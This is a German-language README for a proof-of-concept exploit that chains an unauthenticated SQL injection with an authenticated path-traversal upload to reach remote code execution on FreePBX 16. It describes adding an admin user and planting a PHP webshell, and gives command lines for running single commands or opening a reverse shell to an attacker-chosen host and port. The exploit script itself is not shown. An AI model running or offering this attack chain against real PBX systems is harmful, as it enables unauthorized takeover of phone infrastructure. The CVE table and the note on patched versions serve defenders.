
Proof-of-concept-Exploit, der eine nicht authentifizierte SQL-Injection mit einer authentifizierten Path-Traversal kombiniert, um Remote-Code-Ausführung auf FreePBX 16 zu erreichen. Unterstützt einzelne Befehle und interaktive Reverse-Shells.
Proof-of-concept-Exploit, der zwei FreePBX-Sicherheitslücken verknüpft, um von Nullzugriff zu Remote-Code-Ausführung auf FreePBX 16 zu gelangen.
| CVE | Komponente | Auswirkung |
|---|---|---|
| CVE-2025-57819 | Endpunkt-Modul-Lader (brand-Parameter) | Unauthentifizierte gestapelte SQL-Injection |
| CVE-2025-61678 | Endpoint-Manager-Firmware-Uploader (fwbrand-Parameter) | Authentifizierter willkürlicher Datei-Upload (Path Traversal) |
ampusers-Tabelle INSERT-en.../../../var/www/html/<dir>-Traversal in fwbrand missbraucht, um eine PHP-Webshell in das Web-Root zu schreiben.FreePBX 16 (Endpoint-Modul vor 16.0.92). Auch in 17.0.6 gepatcht.
Auf eine behobene Version aktualisieren.
# single command
python3 exploit.py --rhost pbx.example.com --command "id"
# interactive reverse shell (auto-listener via pwntools)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444
# plain HTTP / custom port
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"
pip install requests pwntools
Nur für autorisierte Sicherheitstests und Bildungszwecke. Verwenden Sie es ausschließlich auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Erlaubnis zum Testen haben. Der Autor übernimmt keine Haftung für Missbrauch.
FreePBX · FreePBX 16 · FreePBX 16.0.40.7 · Sangoma PBX · Asterisk · CVE-2025-57819 · CVE-2025-61678 · unauth. SQL-Injection · gestapelte Abfrage-Injection · Endpunkt-Modul · Endpoint Manager · authentifizierter Datei-Upload · Path Traversal · Remote-Code-Ausführung · RCE · PoC · Exploit · VoIP-Sicherheit
linkedin: ehxb · medium.com/@Ehxb · github 0xEhxb
| Flag | Beschreibung |
|---|
--rhost | Ziel-Host (erforderlich) |
--rport | Ziel-Port (Standard 443) |
--http | HTTP anstelle von HTTPS verwenden |
--lhost / --lport | Reverse-Shell-Rückrufadresse |
--command | Einzelnen Befehl anstelle einer Shell ausführen |